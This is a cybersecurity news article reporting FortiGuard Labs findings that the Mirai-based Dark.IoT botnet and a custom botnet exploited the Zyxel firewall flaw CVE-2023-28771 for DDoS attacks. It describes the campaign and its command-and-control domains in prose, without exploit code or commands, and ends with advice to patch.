Dark.IoT & Custom Botnets Exploit Zyxel Flaw in DDoS Attacks


The Dark.IoT botnet is a variant based on the Mirai botnet that first surfaced in August 2021 and has since expanded its target beyond IoT devices.

In a recent report, FortiGuard Labs uncovered a concerning rise in Distributed Denial of Service (DDoS) botnets exploiting the Zyxel vulnerability (CVE-2023-28771). The vulnerability, identified with a severity rating of 9.8 on the CVSS scoring system, affects multiple firewall models and allows unauthorized attackers to execute arbitrary code by sending a specially crafted packet to the targeted device.

The Zyxel vulnerability came into the spotlight in June 2023 when FortiGuard Labs detected the propagation of several DDoS botnets taking advantage of this security flaw. The flaw was initially reported by researchers from TRAPA Security, and Zyxel issued a security advisory on April 25, 2023. It was subsequently added to the Cybersecurity and Infrastructure Security Agency (CISA) Known Exploited Vulnerabilities (KEV) catalogue in May 2023.

However, FortiGuard Labs’ recent analysis indicated a significant increase in attack bursts starting from May, with multiple botnets involved, including Dark.IoT, a variant based on the notorious Mirai botnet. Additionally, another botnet employed customized DDoS attack methods.

Researchers were also able to identify the attacker’s IP address, revealing that the attacks occurred in various regions, including Central America, North America, East Asia, and South Asia.

Increasing activity of the botnet (FortiGuard Labs)

The attacks specifically targeted the command injection vulnerability in the Internet Key Exchange (IKE) packet transmitted over UDP on Zyxel devices. The attackers utilized tools such as curl or wget to download scripts for further actions. These scripts were tailored for the MIPS architecture, pointing to a highly specific target.

One of the identified botnets, Dark.IoT, made its appearance in 2021 and has since expanded its targeting beyond IoT devices.

The botnet employs the ChaCha20 cryptographic algorithm for encryption and utilizes multiple C2 (Command and Control) servers, including “raw.pastebin.com,” “hoz.1337.cx,” “babaroga.lib,” “dragon.lib,” “blacknurse.lib,” “tempest.lib,” “routercontroller.geek,” and “dvrcontroller.libre.”

The presence of exposed vulnerabilities in devices poses significant risks, as threat actors can gain control over vulnerable devices and incorporate them into their botnets for further attacks, like DDoS assaults.

FortiGuard Labs emphasizes the importance of promptly applying patches and updates to mitigate these risks and ensure the security of IoT devices and Linux servers.

In light of these findings, it is crucial for organizations and users to stay vigilant and take proactive measures to protect their systems from potential exploits. Addressing vulnerabilities promptly is essential in safeguarding against DDoS botnet attacks and other malicious activities targeting vulnerable IoT devices.

As cybersecurity researchers continue to monitor and analyze emerging threats, raising awareness about the importance of security updates and best practices remains vital in safeguarding the digital ecosystem.

  1. Mirai Variant V3G4 Exploiting IoT Devices for DDoS Attacks
  2. DDoS Attacks Soar by 168% on Government Services, StormWall
  3. FortiGuard Labs Discovers .ZIP Domains Fueling Phishing Attacks
  4. IoT Botnet DDoS Attacks Threaten Global Telecom Networks, Nokia
  5. Chinese Gang Storm-0558 Hacked European Govt Emails, Microsoft



Source link